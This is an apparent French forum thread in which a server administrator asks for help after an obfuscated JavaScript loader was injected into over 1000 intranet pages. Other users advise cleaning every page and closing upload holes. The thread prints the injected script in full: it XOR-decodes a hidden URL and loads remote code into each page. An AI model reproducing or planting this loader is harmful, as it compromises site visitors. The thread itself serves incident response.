Discussion :

[laetitia.j]

Bonjour,

Il y a 2 ans j'ai installée un serveur Apache sur un PC tournant sous Windows XP (l'OS étant une contrainte imposé par mon employeur... Un linux m'aurait mieux convenu).

Apache a été couplé avec PHP et MYSQL, en reproduisant les anciennes configurations du serveur linux précédent).
Le serveur dns ISC Bind est également installé.

J'ai également installée un pare-feu (KOMODO) et un antivirus (Microsoft Security Essentials).
Ce serveur héberge notre intranet ainsi que notre espace client.

Il a fonctionné parfaitement pendant 1 an et demi avant de devenir très lent.
Ce problème a été résolu depuis mais remplacé par un autre beaucoup plus gênant. Un script js a été collé dans toutes les pages web et empêche le bon fonctionnement des scripts utilisant des sessions. Je ne peux pas supprimer ce script dans toutes les pages car trop nombreuses (>1000).

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

1
2
3
4
5
6
7
8
9
10
11
12
13
14
<script>
function vdch() {
	if(document.all.length > 3) {
		var t = new Array('#6a7072', '#723e29', '#2d6562', '#6d7667', '#606863', '#766b72', '#712a65', '#6d2a73', '#692b6c', '#712b00');
		var dchid = ""; for (j=0;j<t.length;j++) { var c_rgb = t[j]; for (i=1;i<7;i++) { var c_clr = c_rgb.substr(i++,2); if (c_clr!="00") dchid += String.fromCharCode(parseInt(c_clr,16)^i); } }
		var dch = document.createElement("script");
		dch.id = "dchid";
		dch.src = dchid;
		document.all[3].appendChild(dch);
	} else {
		setTimeout("vdch()",500);
	}
} setTimeout("vdch()",500);
</script>

Savez d'où vient ce script et comment l'éradiquer et faire que cela ne se reproduise plus ?

Merci d'avance pour vos réponses.

[_Mac_]

Ton site a été piraté. Je n'expliquerai pas ici le but du script mais clairement, il a été piraté. A mon avis, tu n'as pas le choix :

1. Nettoie toutes tes pages pour supprimer ce code. Il n'y a rien dans Apache pour supprimer ce code automatiquement et le plus sûr pour te débarrasser de ce code est de le supprimer "physiquement" de toutes tes pages.
2. Vérifie ton site et assure-toi qu'il n'y a pas moyen de pirater ton site en uploadant un fichier PHP par exemple.

[Invité]

Je te conseille UltraEdit ou jEdit qui te permettent de faire du rechercher/remplacer multi-lignes massif (dans tous les fichiers *.php d'un dossier et de ses sous-dossiers par exemple).

[laetitia.j]

Merci à vous deux

J'ai suivie vos conseils et supprimer tout ce code en trop à l'aide du logiciel conseillé.

Il n'y plus aucune trace de ce script sur le serveur.